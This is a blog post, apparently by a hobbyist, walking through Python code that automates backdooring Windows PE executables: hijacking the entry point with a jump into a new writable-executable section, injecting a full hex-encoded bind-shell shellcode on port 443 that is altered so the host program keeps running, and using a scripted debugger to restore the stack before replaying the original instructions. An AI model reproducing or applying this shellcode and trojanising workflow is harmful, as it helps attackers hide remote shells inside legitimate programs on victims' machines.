Automating backdoor creation for PE files
Hello,
In this post I write about my attempt at automating the process of creating backdoors in Windows PE (Portable Executable) files.
This was not a short and quick success: there were many failures and frustrations, but I made some commendable progress by trying harder.
I would like to point out that I am not publishing the entire code. Instead I give an outline of "how to do it", with short code snippets included.
The post highlights where I faced the most issues, where I spent the most time, and where I could have done better.
The rough idea behind a backdoor is to redirect the code flow at the entry point of a PE file to a clean section within the same file, where the shellcode is located to do the evil deed; afterwards it hands control back to the original code of the file.
That statement needs to be discussed in more detail.
[+] Getting the entry point of a PE & making a clean section within PE file.
When you load a program in a debugger (at least Immunity or OllyDbg), you can see that the program stops at its first instruction, well before the main function, and waits for us to let it run further.
Well, that's the entry point. It is this address we need to find, and since this post is about automating the entire process, how did I go about doing it?
When I talk about automating it, I mean pythonizing it (because that's the best automation language I know).
Python comes with a bunch of modules that you can import.
The "pefile" module comes to the rescue!
Reading more about the PE file structure, we learn that the entry point can be found by static analysis (i.e. without running the PE file), because the header has a field which points to it.
Inside the PE OPTIONAL_HEADER we find the attribute "AddressOfEntryPoint".
And in the language of Python:
import pefile

pe = pefile.PE("tempCave.exe")
ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
However, if you compare the value of ep with the actual address shown in the debugger, you will see that they differ by an offset. What is this offset?
It turns out that the value of ep is an RVA (Relative Virtual Address), but relative to what?
PE files have an ImageBase address which, when added to the RVA, gives the actual Virtual Address that we see in the debugger (as long as the image is loaded at its preferred base).
Hence I need to do this:
ep_ava = ep+pe.OPTIONAL_HEADER.ImageBase
Now I have the actual entry point address.
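The arithmetic is small enough to check by hand. Here is a minimal sketch using made-up values rather than ones read from a real file; the function names are mine and are not part of pefile:

```python
def rva_to_va(rva, image_base):
    """Convert a Relative Virtual Address to a Virtual Address."""
    return image_base + rva


def va_to_rva(va, image_base):
    """Inverse conversion; rejects addresses below the image base."""
    if va < image_base:
        raise ValueError("address lies below the image base")
    return va - image_base


# Illustrative values only: 0x00400000 is a common preferred base for
# 32-bit executables, and 0x12C0 stands in for AddressOfEntryPoint.
image_base = 0x00400000
entry_rva = 0x12C0
entry_va = rva_to_va(entry_rva, image_base)
print(hex(entry_va))  # 0x4012c0
```

If the image gets relocated at load time, the debugger shows the base the loader picked instead of the preferred one, so the same RVA maps to a different VA.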
Next, I need the assembly of the first few instructions located at the EP.
For this, another Python module comes to the rescue: pydasm!
After some research on the web, I found a sensible piece of code that did exactly what I required.
import pydasm

# Assumption: read the first 100 bytes at the entry point, as the pefile usage examples do.
data = pe.get_memory_mapped_image()[ep:ep+100]
offset = 0
save_instr = [] #list to save the instructions
d = {} #dictionary mapping the address of each instruction to the instruction text
while offset < len(data):
    i = pydasm.get_instruction(data[offset:], pydasm.MODE_32)
    if not i: #nothing could be decoded here, so stop instead of looping forever
        break
    instr = pydasm.get_instruction_string(i, pydasm.FORMAT_INTEL, ep_ava+offset)
    save_instr.append(instr)
    d[hex(ep_ava+offset)] = instr
    offset += i.length
The offset iterator sets the point from which we shall read the next instruction, and MODE_32 tells pydasm to decode the bytes as 32-bit code.
For rendering, get_instruction_string takes the syntax in which the instruction should be printed (FORMAT_INTEL) and the address of the instruction.
So, right now I have completed two steps towards automation (getting the entry point and getting the initial instructions).
Next up are two more objectives:
[+] Setting up the code cave.
[+] Overwriting the initial instructions to jump to the code cave.
For setting up the code cave, I had to search the web for a long time (struggle!).
Mostly I found that the pefile module of Python supports only limited editing of a PE file.
Then I found this hidden gem in a reddit thread:
https://www.reddit.com/r/ReverseEngineering/comments/1jpghd/addingremoving_sections_with_python/
It seems there is indeed hope for editing PE files to add a new section!
I downloaded the Python module into my Python directory and put it to use:
sections = SectionDoubleP.SectionDoubleP(pe)
sections.push_back(VirtualSize=0x00001000, RawSize=0x00001000, Characteristics=0xE0000020)
In this code, I first define a section object and then the attributes of that section (let me remind you here that the section needs to be "writable" and "executable").
Hence the Characteristics value is "0xE0000020": the section contains code and is readable, writable and executable (the PE equivalent of 777 permissions).
The VirtualSize attribute (a size, not an RVA) tells how large (in bytes) the section should be in memory, and push_back appends this new section after all existing PE file sections.
Technically, the new section starts at ImageBase plus the RVA assigned to it; for example (illustrative numbers), with an image base of 0x00400000 and a section RVA of 0x00005000, it starts at virtual address 0x00405000.
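To see what a Characteristics value actually asks for, it helps to split it into its individual flags. The sketch below uses the flag values from the PE/COFF section header definition; the table covers only a handful of the defined flags, and the helper name is mine:

```python
# A subset of the section flags defined by the PE/COFF format.
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}


def decode_characteristics(value):
    """Return the names of the known flags set in a Characteristics value."""
    return [name for bit, name in sorted(SECTION_FLAGS.items()) if value & bit]


for name in decode_characteristics(0xE0000020):
    print(name)
```

For comparison, a typical code section carries 0x60000020, which is the same set without IMAGE_SCN_MEM_WRITE.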
Next I need to overwrite the original instructions with my "hijacking" instruction.
It has to redirect execution to the start of our newly made code cave.
Here I prefer to use a jump. Why not a call? Because I hate meddling with the stack, especially when I am modifying the file statically and have no idea what values the registers will hold!
The trick with jmp <address>, which I did not know, is that in this form of the instruction (opcode E9) the <address> is a relative one.
Relative to what?
Well, the formula is:
<address> = [dest. address] - [start address] - 5
dest. address = start address of the new PE section that we made
start address = address where the jmp itself is written (here, the entry point)
-5 = the size of the jmp instruction itself, because the offset is counted from the end of the jmp.
Hence the rough code I came up with was this:
jmp_address = int(dest_address,16) - int(start_address) - 5
jmp_address = hex( struct.unpack( '<L', struct.pack('>L', jmp_address) ) [0] ) [2:] #to make the address in little endian for Intel.
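As a cross-check of the formula, here is a small self-contained sketch of the E9 rel32 encoding. It is written for Python 3 (unlike the rest of the post), the addresses are made up, and the function name is mine:

```python
import struct


def encode_jmp_rel32(jmp_address, dest_address):
    """Encode `jmp dest_address` as it would sit at jmp_address (E9 + rel32)."""
    # The displacement is counted from the end of the 5-byte instruction.
    displacement = dest_address - (jmp_address + 5)
    if not -2**31 <= displacement < 2**31:
        raise ValueError("target is out of rel32 range")
    # '<i' = signed 32-bit little-endian, so backward jumps encode correctly.
    return b"\xe9" + struct.pack("<i", displacement)


# Illustrative addresses only.
forward = encode_jmp_rel32(0x00401000, 0x00405000)
backward = encode_jmp_rel32(0x00405000, 0x00401000)
print(forward.hex())   # e9fb3f0000
print(backward.hex())  # e9fbbfffff
```

The signed format matters: a backward jump has a negative displacement, which an unsigned 'L' format cannot represent. Packing straight to bytes also keeps leading zero bytes, which a round trip through hex() would drop.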
All right, now we just need to prepend the jmp opcode "\xe9" to the offset generated above.
So we are going to write "\xe9" + "jmp_address" opcodes at the entry point.
Before writing to the file, we remember to save the original legitimate instructions so that we can replay them later.
Code to rewrite the entry point instructions:
print "\t[+]overwriting entrypoint with a jump to code cave"
ep_hex = int(ep_hex,16)
for instruction in jmp_opcodes:
#print "injecting value: " + instruction + " injecting at: " + str(ep_hex)
instruction = int(instruction,16)
status = pe.set_bytes_at_rva(ep_hex,chr(instruction))
if(status is False):
print "[!]entry point hijacking failed..."
ep_hex = ep_hex + 1
Once the entry point has been overwritten with jmp <new_PE_section_address>, we can fill the new clean PE section: first the instructions that save the registers and flags (pushad, pushfd), then the shellcode.
Here I used a hex-encoded bind shellcode that binds to port 443.
I know that having a hardcoded shellcode is not true automation, but maybe that's for version 1.1 (as an improvement?)
shellcode = "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd56a085950e2fd4050405068ea0fdfe0ffd59768020001bb89e66a10565768c2db3767ffd55768b7e938ffffd5576874ec3be1ffd5579768756e4d61ffd568636d640089e357575731f66a125956e2fd66c744243c01018d442410c60044545056565646564e565653566879cc3f86ffd589e0905690ff306808871d60ffd5bbfe0e32ea68a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd5"
I would like to point out that the shellcode above has been "backdoorified": the stock version waits for an infinite time because a value of -1 is pushed onto the stack.
I have changed the opcodes above so that the bind works without hampering the execution of the original program (the one we are backdooring).
The shellcode is written into the new section using this code:
shellcode_len = len(shellcode)
write_code = []
#making instruction list
for i in range(0,shellcode_len,2):
write_code.append(shellcode[i:i+2])
number_of_instructions = len(write_code)
#setting EIP to the next memory location to write[robed = name of new PE section that I made]
robed_VA = robed_VA + 1
#writing shellcode
count = 0
while(number_of_instructions > 0):
pe.set_bytes_at_rva(robed_VA, chr(0x9c))
shellcode_instruction = "0x" + write_code[count]
shellcode_instruction = int(shellcode_instruction, 16)
status = pe.set_bytes_at_rva(robed_VA,chr(shellcode_instruction))
# print "injecting value: " + str(hex(shellcode_instruction)) + " injecting at: " + str(hex(robed_VA))
# print status
robed_VA = robed_VA + 1 #increment to next instruction pointer
count = count + 1 #increment the write_code counter to write the next instruction of shellcode
# if count> 10:
# break
number_of_instructions = number_of_instructions - 1 #decrement number_of_instructions until zero to stop while loop
print "[+]Shellcode successfully written"
We will now proceed to save the file.
#code
pe.write(filename="tmp.exe")
Now this saved PE file has its entry point hijacked, the registers and flags saved (pushad, pushfd), and the shellcode written into the new section.
We now have three more points to cover:
[+] Post shellcode execution, adjust ESP to initial ESP
[+] Pop the initial registers and flags (popfd, popad [since the stack is a FILO structure])
[+] Write the initial instructions which were saved, so that the actual program runs normally
Adjusting ESP was the biggest hindrance: I spent three days fighting over how to restore ESP to a known value while doing only static file analysis and editing.
It quickly became clear that to automate this step I would need some extra juice!
[*] Here comes Dynamic analysis via Python
Immunity could not be automated unless I explicitly ran a PyCommand, and I could not find any suitable way to run PyCommands from a Python script without running Immunity itself.
For OllyDbg I could not find any Python integration.
After running through multiple blogs and asking questions here and there (no answers!), I came upon a thread which talked about the pykd Python module and its WinDbg integration.
I must say, much of the pykd documentation is in Russian, and I had to read for quite a while to get enough of a hold on it for my automation needs.
And here comes the code which made adjusting ESP successful.
[+] Saving initial ESP:
pykd.startProcess(fileName)
print "[+]setting entry point breakpoint"
pykd.dbgCommand("bp $exentry")
print "[+]stepping into breakpoint"
pykd.dbgCommand("g")
print "[+]Fetching address of esp @entryPoint"
#print "[+]" + str(pykd.dbgCommand("r esp"))
initial_esp = str(pykd.dbgCommand("r esp"))
#print type(initial_esp)
initial_esp = initial_esp.split("=")[1]
#print "splitted..." + initial_esp
initial_esp = "0x"+initial_esp
print "[+]Initial ESP: " + initial_esp
initial_esp = int(initial_esp,16)
[+] Getting the final ESP (breakpoint where the shellcode ends [can be calculated from the length of the shellcode])
print "[+]Starting the temporary executable which we had saved earlier"
pykd.startProcess("tmp.exe")
print "\t[+]setting final breakpoint"
bpCmd = "bp " + final_eip
pykd.dbgCommand(bpCmd)
print "\t[+]stepping into breakpoint"
print "\t[+]make a connection to the host at port 443"
print "\t[+]waiting..."
pykd.dbgCommand("g")
print "\t[+]Fetching address of esp @entryPoint"
print "\t[+]" + str(pykd.dbgCommand("r esp")).replace("=",":")
final_esp = str(pykd.dbgCommand("r esp"))
print final_esp
print "[+]processing esp..."
final_esp = final_esp.split("=")[1]
final_esp = "0x"+final_esp
final_esp = int(final_esp,16)
print "\t[+]Final esp: " + str(final_esp)
And that got me out of the seemingly tight spot of how to calculate the ESP.
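Both snippets above pull the register value out of the debugger's text output with split("="), which works as long as the output holds exactly one name=value pair. A slightly more defensive sketch is shown below; it runs on plain strings, so it does not need pykd, and the sample values and the helper name are made up:

```python
import re


def parse_register(output, name="esp"):
    """Pull a register value out of text such as 'esp=0012ffc4'."""
    match = re.search(r"\b%s=([0-9a-fA-F]+)" % re.escape(name), output)
    if match is None:
        raise ValueError("no %s value in %r" % (name, output))
    return int(match.group(1), 16)


# Sample strings shaped like the debugger output; the values are made up.
initial_esp = parse_register("esp=0012ffc4\n")
final_esp = parse_register("eax=00000001 esp=0012fdc0\n")
print(hex(initial_esp), hex(final_esp), hex(initial_esp - final_esp))
```

Raising an error when the register is missing makes a changed output format show up immediately instead of as an IndexError further down.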
Next up is simply an add esp, <esp address difference>
followed by writing popfd, popad.
Now for replaying the initial instructions: remember we saved them?
We will now write these just after the popad (which is the last instruction).
Replaying the original instructions can be a little complicated. However, since the address was saved for each initial instruction, I was able to write the original push instruction and then write the address of the original call instruction to redirect to the original code flow.
But this part certainly needs a more generic approach on my part.
With this, I shall end this long post.
Though many of you might find this redundant, and the code/logic may be hugely unoptimized, I wanted to share how I did it on my path of struggle (call it blabbering :P)
- nightcr4wl3r